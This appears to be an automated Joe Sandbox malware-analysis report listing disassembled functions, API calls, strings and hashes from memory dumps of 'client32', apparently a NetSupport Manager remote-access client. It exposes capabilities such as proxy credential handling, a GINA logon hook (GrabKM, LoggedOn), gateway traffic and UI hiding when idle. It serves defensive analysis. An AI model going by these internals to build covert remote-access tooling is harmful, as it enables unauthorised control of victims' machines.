Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp
String ID: %02x %02x$%s$3'$CMD=NC_DATA$Error %d sending HTTP request on connection %d$Error %d writing inet request on connection %d$Error send returned 0 on connection %d$NC_DATA$SendHttpReq failed, not connected to gateway!$abort send, gateway hungup$xx %02x
API String ID: 909875538-2848211065
Opcode ID: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
Instruction ID: 2ef811b70579311959dfd9ad39713bda9f9f37d801767944afe4c474126e2712
Opcode Fuzzy Hash: c0ddaf445a32a1138975d6a5c9697123393f874da37b6a50d6b6ae8a1c164734
Instruction Fuzzy Hash: FCD1DD75A042559FDF20CF68CC84BEEBBB5AF4A314F8440D9D81D9B242D7319A84CF92

Function 11028290 Relevance: 42.5, APIs: 2, Strings: 22, Instructions: 542
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,74591370,?,0000001A), ref: 1102837D
_strrchr.LIBCMT ref: 1102838C

Part of subcall function 11160E4E: __stricmp_l.LIBCMT ref: 11160E8B

Strings

AssistantURL, xrefs: 11028759
NSSAppDataDir, xrefs: 110286C5
Name, xrefs: 110284DE
??F, xrefs: 11028910
SupportEMail, xrefs: 11028665
NSSName, xrefs: 110285D5
\, xrefs: 1102830C
TechConsole, xrefs: 110287BD
SupportWWW, xrefs: 11028635
NSSTLA, xrefs: 11028605
ShortName, xrefs: 11028545
Home, xrefs: 11028575
NSSLongCaption, xrefs: 110287F5
NSMAppDataDir, xrefs: 11028695
??I, xrefs: 11028997
AssistantName, xrefs: 1102872C
NSSConfName, xrefs: 110286F5
SupportsChrome, xrefs: 11028786
product.dat, xrefs: 11028340, 11028391
SupportsAndroid, xrefs: 11028822
LongName, xrefs: 11028515
TLA, xrefs: 110285A5

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileModuleName__stricmp_l_strrchr
String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
API String ID: 1609618855-357498123
Opcode ID: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction ID: 3ecfaec1c78aa64732578d28134276498dc59d4967fe96fbd16849b56c65f872
Opcode Fuzzy Hash: bffd7a72419acbf4e69006bd0d2009b0d15558627307e104a623c4426f2c4fa7
Instruction Fuzzy Hash: 0E12E33ED052A78BDB55CF24CC807D8B7F4AB1A308F4440EAE99597205EB719786CB92

Function 685A6BA0 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 273
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 685A6BD5
GetTickCount.KERNEL32 ref: 685A6C26
Sleep.KERNEL32(00000064), ref: 685A6C5B

Part of subcall function 685A6940: GetTickCount.KERNEL32 ref: 685A6950

WaitForSingleObject.KERNEL32(00000304,?), ref: 685A6C7C
_memmove.LIBCMT ref: 685A6C93
select.WSOCK32(00000000,?,00000000,00000000,?), ref: 685A6CB4
Sleep.KERNEL32(00000032,00000000,?,00000000,00000000,?), ref: 685A6CD9
GetTickCount.KERNEL32 ref: 685A6CEC
_calloc.LIBCMT ref: 685A6D76
GetTickCount.KERNEL32 ref: 685A6DF3
InterlockedExchange.KERNEL32(02B42F1A,00000000), ref: 685A6E01
_calloc.LIBCMT ref: 685A6E33
_memmove.LIBCMT ref: 685A6E47
InterlockedDecrement.KERNEL32(02B42EC2), ref: 685A6EC3
SetEvent.KERNEL32(00000308), ref: 685A6ECF
_memmove.LIBCMT ref: 685A6EF4
GetTickCount.KERNEL32 ref: 685A6F4F
InterlockedExchange.KERNEL32(02B42E62,-685DA188), ref: 685A6F60

Strings

ReadMessage returned FALSE. Terminating connection, xrefs: 685A6F3A
ProcessMessage returned FALSE. Terminating connection, xrefs: 685A6F25
ResumeTimeout, xrefs: 685A6BBA
FALSE, xrefs: 685A6E67
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 685A6E62
httprecv, xrefs: 685A6BDD

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Interlocked_memmove$ExchangeSleep_calloc$DecrementEventObjectSingleWaitselect
String ID: FALSE$ProcessMessage returned FALSE. Terminating connection$ReadMessage returned FALSE. Terminating connection$ResumeTimeout$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$httprecv
API String ID: 1449423504-919941520
Opcode ID: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
Instruction ID: 5768964ac529070e8d603857501e83de661ed71089ed95d69a90bef8bcf9960d
Opcode Fuzzy Hash: 115160e606d15e04964988cc5f3d42d282596d0551780c349f8adbf61502a5e1
Instruction Fuzzy Hash: B7B1A0B5D002549FDF20DB68CC84BEEB7B4EB49344F81409AEA59A7240E7B49EC4CF95

Function 11085840 Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 161
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000001,?), ref: 110858CC
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110858EA
LoadLibraryA.KERNEL32(?), ref: 1108592C
GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11085947
GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108595C
GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108596D
GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108597E
GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108598F
GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 110859A0

Strings

CipherServer_GetRandomData, xrefs: 110859BC
CipherServer_GetInfoBlock, xrefs: 11085967
CryptPak.dll, xrefs: 1108589B, 110858FE
CipherServer_Create, xrefs: 11085941
CipherServer_DecryptBlocks, xrefs: 110859AB
CipherServer_EncryptBlocks, xrefs: 1108599A
CipherServer_CloseSession, xrefs: 11085989
CipherServer_OpenSession, xrefs: 11085978
CipherServer_ResetSession, xrefs: 110859CD
CipherServer_Destroy, xrefs: 11085956

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$FileModuleName
String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
API String ID: 2201880244-3035937465
Opcode ID: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction ID: e9fa9a36c663d757a0c8add56282bddb088a97f97ce07886abf3270b6b50a9db
Opcode Fuzzy Hash: 337901d8a57ff9f2c74122cebfcf765c1ae8331dc4db4cdad0fbf418eb706ca4
Instruction Fuzzy Hash: C051DE70E0431AAFD710DF79C880AAAFBF8AF49304B2185AAE8D5C7244EB71E441CF51

Function 11105D40 Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 213
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
CloseHandle.KERNEL32(00000000), ref: 11105E29
GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
LoadLibraryA.KERNEL32(?), ref: 11105E71
GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
FreeLibrary.KERNEL32(?), ref: 11105EDB

Part of subcall function 1110C2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001), ref: 1110C2C7
Part of subcall function 1110C2B0: CreateThread.KERNEL32(00000000,00000001,00000000,00000000,00000000,0000000C), ref: 1110C2EA
Part of subcall function 1110C2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C317
Part of subcall function 1110C2B0: CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C321

GetStockObject.GDI32(0000000D), ref: 11105EEF
GetObjectA.GDI32(00000000,0000003C,?), ref: 11105EFF
InitializeCriticalSection.KERNEL32(0000003C), ref: 11105F1B
InitializeCriticalSection.KERNEL32(111EC5C4), ref: 11105F26

Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
Part of subcall function 111042A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105F69

Part of subcall function 1109DCF0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
Part of subcall function 1109DCF0: OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
Part of subcall function 1109DCF0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 11105FBA
CloseHandle.KERNEL32(00000000,Function_000FFE60,00000001,00000000), ref: 1110600F

Strings

\pcigina, xrefs: 11105E50
LoggedOn, xrefs: 11105EB0
GrabKM, xrefs: 11105E98
LPT1, xrefs: 11105DF9
nsm_gina_sas, xrefs: 11105E04

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_memsetwsprintf
String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
API String ID: 539809342-403456261
Opcode ID: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
Instruction ID: 98d48469d2e7b61091a73167657919c28ab3cbb48a1ba220805b109c32019478
Opcode Fuzzy Hash: b18508c46a18bbf34551defff19b016e4d08b159e6cc9be7a7aa41d6413da877
Instruction Fuzzy Hash: 6981B1B1E007569FDB51CFB48C89BAAFBE5BB08308F10857DE569D7280D7706A40CB12

Function 11136060 Relevance: 31.8, APIs: 12, Strings: 6, Instructions: 348windowCOMMON

Download Yara Rule

APIs

Part of subcall function 11141710: GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
Part of subcall function 11141710: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
Part of subcall function 11141710: _memset.LIBCMT ref: 1114179D
Part of subcall function 11141710: _strncpy.LIBCMT ref: 1114186A

PostMessageA.USER32(00010480,000006CF,00000007,00000000), ref: 1113623F

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

SetWindowTextA.USER32(00010480,00000000), ref: 111362E7
IsWindowVisible.USER32(00010480), ref: 111363AC
GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?), ref: 111363CC
IsWindowVisible.USER32(00010480), ref: 111363DA
SetForegroundWindow.USER32(00000000), ref: 11136408
EnableWindow.USER32(00010480,00000001), ref: 11136417
IsWindowVisible.USER32(00010480), ref: 11136468
IsWindowVisible.USER32(00010480), ref: 11136475
EnableWindow.USER32(00010480,00000000), ref: 11136489
EnableWindow.USER32(00010480,00000000), ref: 111363EF

Part of subcall function 1112E330: ShowWindow.USER32(00010480,00000000,?,11136492,00000007,?,?,?,?,?,00000000,?,?,?,?,?), ref: 1112E354

EnableWindow.USER32(00010480,00000001), ref: 1113649D

Strings

Client, xrefs: 111360E1, 1113618B, 111361C4, 11136222
ViewedText, xrefs: 1113616B
LockedText, xrefs: 111361BF
ShowUIOnConnect, xrefs: 1113621D
ConnectedText, xrefs: 11136178, 11136187
HideWhenIdle, xrefs: 111360DC

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
API String ID: 3453649892-3803836183
Opcode ID: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction ID: e84f8c9860d0a84ca21d0dbcc5e0864e350968dbdf20df23b648977f69907e2d
Opcode Fuzzy Hash: 933d860dfa7abdf9aec1ce1cc807207ef57f020f96dc405baf31ced77d609c35
Instruction Fuzzy Hash: 02C13C75F113259BEB02DFE4CD85BAEF7A6AB8032DF104438D9159B288EB31E944C791

Function 685A33A0 Relevance: 29.1, APIs: 2, Strings: 17, Instructions: 571COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 685A34FD
wsprintfA.USER32 ref: 685A3727

Strings

Gateway_WebProxy, xrefs: 685A359D
ProxyCred, xrefs: 685A362A
PinProxy, xrefs: 685A35ED
%s:%s, xrefs: 685A3721
*WebProxy, xrefs: 685A3459
:%d, xrefs: 685A34F7
ProxyUsername, xrefs: 685A36E0
ProxyPassword, xrefs: 685A36F7
r<Zh, xrefs: 685A33B3
*GatewayAddress, xrefs: 685A3430
UsePinProxy, xrefs: 685A35D0
P, xrefs: 685A3533
client247, xrefs: 685A362F
Gateway_UseWebProxy, xrefs: 685A3585
Gateway, xrefs: 685A3577
*UseWebProxy, xrefs: 685A343C
*PINServer, xrefs: 685A35C4

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<Zh
API String ID: 2111968516-3873424096
Opcode ID: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
Instruction ID: 33063267e8ada4de353dc1dea75aee9a45cf1d88fb422f9f4f127c992a54f939
Opcode Fuzzy Hash: 5681b0e9510a602a87d8b9d493e70a331f209f5027bf97fd1cecacb1d035b689
Instruction Fuzzy Hash: 3D2272B6A00368AFDF21CF68CCC0EEEB7B9AB4A204F8485D9E559A7540D6315F84CF51

Function 11030444 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 357libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 11030450
GetProcAddress.KERNEL32(00000000), ref: 11030457
GetNativeSystemInfo.KERNEL32(?), ref: 11030465
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Strings

.%d, xrefs: 11030782
kernel32.dll, xrefs: 11030449
Error %s unloading audiocap dll, xrefs: 1103098F
pcicl32, xrefs: 11030851
GetNativeSystemInfo, xrefs: 11030444

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorModeObject$AddressExchangeHandleInfoInterlockedModuleNativeProcStockSystem
String ID: .%d$Error %s unloading audiocap dll$GetNativeSystemInfo$kernel32.dll$pcicl32
API String ID: 711497182-3782231422
Opcode ID: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
Instruction ID: f63cb038d00ac44cf3594e94df0c2f2de2f1e5b42f8671348dba24db1a15b590
Opcode Fuzzy Hash: 106fb8bc483957a45cfa904f75695c57fc0a23e7e1dbb6dc441bbb2ace021997
Instruction Fuzzy Hash: 59D172B0D16369DEDF02CBB48C447EDBEF5AB8430CF1001A6D849A7289F7755A84CB92

Function 110302A9 Relevance: 28.4, APIs: 9, Strings: 7, Instructions: 350registryCOMMON

Download Yara Rule

APIs

Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690

RegCloseKey.KERNEL32(?), ref: 110303C3
GetStockObject.GDI32(0000000D), ref: 11030672
GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778

Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222

Strings

.%d, xrefs: 11030782
Error %s unloading audiocap dll, xrefs: 1103098F
pcicl32, xrefs: 11030851
CurrentMinorVersionNumber, xrefs: 1103038C
CurrentMajorVersionNumber, xrefs: 11030359
3, xrefs: 110303F2
CurrentVersion, xrefs: 110302BC

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
